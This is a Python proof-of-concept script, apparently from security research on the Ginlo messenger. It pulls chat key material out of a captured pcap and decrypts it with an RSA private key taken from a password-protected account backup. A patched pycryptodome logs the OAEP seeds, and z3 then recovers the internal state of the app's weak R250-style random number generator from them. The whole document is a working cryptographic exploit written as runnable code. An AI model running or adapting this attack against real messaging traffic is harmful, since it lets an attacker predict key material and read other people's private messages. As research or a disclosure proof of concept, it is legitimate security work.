#!/usr/bin/env python3.11

# requires 7z to be installed
# please run the below comaand to extract the http bodies from the pcap
# $ tshark -r mallory.pcap -T fields -e http.file_data > http_bodies

# Extracting from a pcap because, at least on iOS, the app caches the chat AES
# keys and thus does not run the RSA decryption on every message. That also
# means one can't log the seed used in OAEP encryption.
# Doing the decryption myself seemed simpler than trying to invalidate the app's cache.

import base64
import hashlib
import io
import json
import subprocess
import tempfile
from pathlib import Path
from time import time

from Crypto.Cipher import AES, PKCS1_OAEP
from z3 import *

HTTP_BODIES = "http_bodies"
BACKUP_ZIP = "ginlo-backup-J967VGD2.zip"
BACKUP_PASSWORD = "a"


def insert_if_not_present(lst, item):
    if item not in lst:
        lst.append(item)


def extract_keys_from_http_bodies():
    bodies = Path(HTTP_BODIES).read_text().splitlines()
    bodies = [bytearray.fromhex(line).decode() for line in bodies if len(line) > 0]
    bodies = [line for line in bodies if not line.startswith("cmd=")]
    bodies = [line for line in bodies if "PrivateMessage" in line]
    json_bodies = []
    for line in bodies:
        try:
            json_bodies.append(json.loads(line))
        except:
            print("Error parsing json:")
            print(line)
            pass

    keys = []
    for b in json_bodies:
        for message in b:
            if isinstance(message, str):
                try:
                    j = json.loads(message)
                except:
                    continue
            else:
                j = message["PrivateMessage"]
            to_dict = j["to"][0]
            t = to_dict[list(to_dict.keys())[0]]
            insert_if_not_present(keys, (j["datesend"], t["key"]))
    return keys


def extract_rsa_keys_from_backup():
    with tempfile.TemporaryDirectory() as tmpdir:
        process = subprocess.Popen(
            ["7z", "x", BACKUP_ZIP, "-o" + tmpdir],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        stdout, stderr = process.communicate()
        with open(tmpdir + "/info.json", "r") as infojson:
            info = json.load(infojson)[0]["BackupInfo"]
            salt = info["salt"]
            pbkdf_salt = base64.b64decode(info["pbdkfSalt"])
            pbkdf_rounds = info["pbdkfRounds"]

        with open(tmpdir + "/account.json", "rb") as accountjson:
            account_enc = accountjson.read()

        iv = account_enc[:16]

        password = BACKUP_PASSWORD
        digest = hashlib.pbkdf2_hmac("sha1", password.encode(), pbkdf_salt, 80000, 32)
        cipher = AES.new(digest, AES.MODE_CBC, iv)
        account_dec = cipher.decrypt(account_enc[16:])
        if account_dec[:20] == b'[{"AccountBackup":{"':
            decoded = account_dec.decode("unicode-escape").strip()
            idx = decoded.index("]")
            account_json = json.loads(decoded[: idx + 1])
            account_json = account_json[0]["AccountBackup"]
            privkey = account_json["privateKey"]
            pubkey = account_json["publicKey"]
            return privkey, pubkey
        else:
            print("could not decrypt the backup")
            exit()


##### stackoverflow code
import xml.etree.ElementTree as ET

from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa


def convert_xml_to_pem(private_key_xml_content: str, public_key_xml_content: str):
    # Load private key from XML
    private_key_data = ET.fromstring(private_key_xml_content)
    public_key_data = ET.fromstring(public_key_xml_content)
    inverseQ = int.from_bytes(
        base64.b64decode(private_key_data.find("InverseQ").text), "big"
    )
    modulus = int.from_bytes(
        base64.b64decode(private_key_data.find("Modulus").text), "big"
    )
    p = int.from_bytes(base64.b64decode(private_key_data.find("P").text), "big")
    inverseQmodP = inverseQ % p
    exponent = int.from_bytes(
        base64.b64decode(public_key_data.find("Exponent").text), "big"
    )
    public_numbers = rsa.RSAPublicNumbers(exponent, modulus)
    private_key = rsa.RSAPrivateNumbers(
        p,
        int.from_bytes(base64.b64decode(private_key_data.find("Q").text), "big"),
        int.from_bytes(base64.b64decode(private_key_data.find("D").text), "big"),
        int.from_bytes(base64.b64decode(private_key_data.find("DP").text), "big"),
        int.from_bytes(base64.b64decode(private_key_data.find("DQ").text), "big"),
        inverseQmodP,
        public_numbers,
        # int(private_key_data.find('InverseQ').text, 16)
    ).private_key(default_backend())

    private_key_pem = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption(),
    )

    # Load public key from XML
    # public_key_data = ET.fromstring(public_key_xml_content)
    public_key = public_numbers.public_key(default_backend())

    public_key_pem = public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    return private_key_pem, public_key_pem


from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding

privkey, pubkey = extract_rsa_keys_from_backup()
private_key_pem, public_key_pem = convert_xml_to_pem(privkey, pubkey)
key = RSA.import_key(private_key_pem, passphrase=None)
##### end of stackoverflow code

messages = extract_keys_from_http_bodies()
messages = sorted(messages, key=lambda x: x[0])

count = 0
for m in messages:
    try:
        f = io.StringIO()
        message = base64.b64decode(m[1])
        cipher = PKCS1_OAEP.new(key)
        plain = cipher.decrypt(message)
        # print(m)
        count += 1
    except:
        print("fail")
        pass

print(f"successfully got RNG outputs from messages")
oaep_seeds = bytearray()
# patched the corresponding .py in pycryptodome to save all the seeds to a list
# i.e. in python3.11/site-packages/Crypto/Cipher/PKCS1_OAEP.py:
# ➜ diff PKCS1_OAEP.py_old PKCS1_OAEP.py
# 31a32,33
# > SEEDS = []
# >
# 158a161,162
# >         global SEEDS
# >
# 200a205
# >         SEEDS.append(seed)
for s in PKCS1_OAEP.SEEDS:
    oaep_seeds += s

rng_output = [
    int.from_bytes(oaep_seeds[i : i + 4], byteorder="big")
    for i in range(2 * 20, len(oaep_seeds) - 20 * 20, 4)
]


def z3_next(sym_state, i):
    return sym_state[i] ^ sym_state[i + 103]


NUM_TABLES = 400
OFFSET = (NUM_TABLES - 100) * 250  # location of the state table in the SAT's memory


def z3_recover_state_consecutive(outputs):
    start_time = time()
    solver = Solver()
    solver.set(unsat_core=True)
    solver_states = []
    states_needed = NUM_TABLES
    for i in range(states_needed * 250):
        solver_states.append(BitVec(f"R250[{i}]", 32))

    s_add_time = time()

    for i in range(len(solver_states) - 250):
        solver.add(solver_states[i] ^ solver_states[i + 103] == solver_states[i + 250])
    j = 0
    for i in range(len(outputs) * 2):
        if j >= len(outputs):
            break
        if i % 10 < 5:
            solver.add(solver_states[i + OFFSET] == outputs[j])
            j += 1

    print("add time:", time() - s_add_time)

    result = solver.check()
    if result == sat:
        print("time taken :", time() - start_time)
        model = solver.model()
        state_table = {str(j): model[j].as_long() for j in model.decls()}
        state = [state_table[f"R250[{j}]"] for j in range(states_needed * 250)]
        print("recovered state table:")
        print(state[OFFSET : OFFSET + 250])
        return state
    else:
        print("unsat")
        # print(solver.unsat_core())
        exit()


def reconstruct_state_consecutive():
    # "only" 500 states (100 messages) are needed to recover the state table
    decrypted = rng_output[:500]
    print(f"using {len(decrypted)} 32-bit outputs to recover state table")
    print(f"using {NUM_TABLES} state tables")
    states = z3_recover_state_consecutive(decrypted)
    print(f"found {len(states)} states")
    exit()


if __name__ == "__main__":
    reconstruct_state_consecutive()
